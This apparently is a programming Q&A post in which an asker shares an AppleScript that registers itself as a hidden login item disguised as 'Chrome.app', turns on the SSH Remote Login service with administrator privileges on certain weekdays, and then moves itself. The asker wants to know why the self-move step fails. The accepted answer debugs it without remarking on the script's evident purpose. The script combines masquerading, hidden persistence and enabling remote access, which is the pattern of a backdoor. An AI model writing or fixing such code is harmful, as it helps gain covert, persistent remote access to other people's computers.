# I can't get my script to move itself

Tags: applescript

I made this bit of code that makes a script move its self. When I place it in a blank script it works fine, but once I place it in my main script it doesn't work.

Here is my code:

```
-------------------------------------------------------------------------------------------
--------------------------------Putting inside Loggin Items-----------------------------


set myPath to path to me

tell application "System Events"

    make new login item at end of login items with properties {name:"Chrome.app", path:myPath, hidden:true}

end tell

-------------------------------------------------------------------------------------------
--------------------------------Turning on RemoteLogin--------------------------------


on remoteLogin(value)

    do shell script "launchctl " & value & " -w /System/Library/LaunchDaemons/ssh.plist" with administrator privileges

end remoteLogin

if weekday of (current date) is in {Sunday, Monday} then

    remoteLogin("load")

else

    return "not Sunday or Monday"

end if


---------------------------------------------------------------------------------------
------------------------------------Moving Script------------------------------------


set thePath to POSIX path of (path to me as text)

do shell script "mv " & thePath & " ~/Desktop/no"
```

Answer (score 0, accepted):

I tried it using this code:

```
    set myPath to path to me

    tell application "System Events"

        make new login item at end of login items ¬
            with properties ¬
            {name:"test", path:myPath, hidden:true}

    end tell


    tell application "System Events" to move myPath to the desktop folder
```

and it moved the file successfully.  The login item created also automatically had its path updated (I'm not sure whether this is a desirable outcome for you or not).

As for why yours does not move, my guess is that it wasn't a Sunday or a Monday, in which case your script terminates at the `return` statement, before getting to the part of the script that moves the file.